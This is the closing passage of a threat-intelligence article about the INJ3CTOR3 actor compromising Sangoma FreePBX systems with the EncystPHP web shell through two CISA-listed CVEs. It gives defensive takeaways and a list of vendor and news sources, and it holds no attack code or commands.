- INJ3CTOR3 is persistent and adaptive: Three CVEs, six years, an evolving toolset, and a clear monetization model. Organizations that depend on VoIP infrastructure for revenue-generating operations — call centers, healthcare, financial services, legal — should assess their exposure to this actor class specifically.
- CISA KEV designation means exploitation is real and ongoing: When a vulnerability enters the KEV catalog, the remediation clock is running. For organizations operating under federal compliance frameworks, this is a legal obligation. For everyone else, it is a strong signal that theoretical risk has become operational reality. FreePBX now has multiple entries in the KEV catalog — CVE-2025-57819 (added August 2025, pre-authentication, CVSS 10.0) and CVE-2025-64328 (added February 2026, post-authentication, CVSS 8.6) — meaning this platform has been under continuous active exploitation for most of the past year. Treat it accordingly.
There is a certain uncomfortable irony in the fact that a phone system — a technology whose entire purpose is enabling human communication — became a vector for silent, long-running criminal activity that its operators never heard or saw. The organizations whose PBX systems were compromised by EncystPHP continued making and receiving calls. Business continued. And somewhere, EncystPHP's "Ask Master" interface was waiting patiently for its next instruction, running as root, with full knowledge of every extension, every credential, and every call that passed through a system the attacker now owned more completely than the organization that was paying the bill.
The controls exist. The patches are available. The detection methods are documented. What remains is the harder organizational work: expanding the security perimeter in the minds of leadership and in the budgets of IT departments to include the infrastructure that everyone uses but almost nobody audits.
Sources & References
- FortiGuard Labs — "Unveiling the Weaponized Web Shell EncystPHP," Vincent Li, January 28, 2026
- The Hacker News — "900+ Sangoma FreePBX Instances Compromised in Ongoing Web Shell Attacks," February 2026
- Security Affairs — "CVE-2025-64328 exploitation impacts 900 Sangoma FreePBX instances," Pierluigi Paganini, March 2026
- SecurityWeek — "900 Sangoma FreePBX Instances Infected With Web Shells," February 2026
- Check Point Research — "INJ3CTOR3 Operation: Leveraging Asterisk Servers for Monetization," Ido Solomon, Ori Hamama, Omer Ventura, November 2020
- Rescana — "Ongoing Cyberattack Exploits Sangoma FreePBX CVE-2025-64328," 2026
- CISA KEV Catalog — CVE-2025-64328 entry
- CISA — CVE-2025-57819 KEV Addition Alert, August 29, 2025
- Cyber Security News — "Hackers Exploiting FreePBX Vulnerability to Deploy Webshell," January 2026
- Palo Alto Networks Unit 42 — "Digium Phones Under Attack: Insight Into the Web Shell Implant," July 2022
- The Shadowserver Foundation — @Shadowserver tweet, February 24, 2026 (FreePBX webshell victim overview treemap)
- FreePBX Security Advisory — CVE-2025-64328, November 2025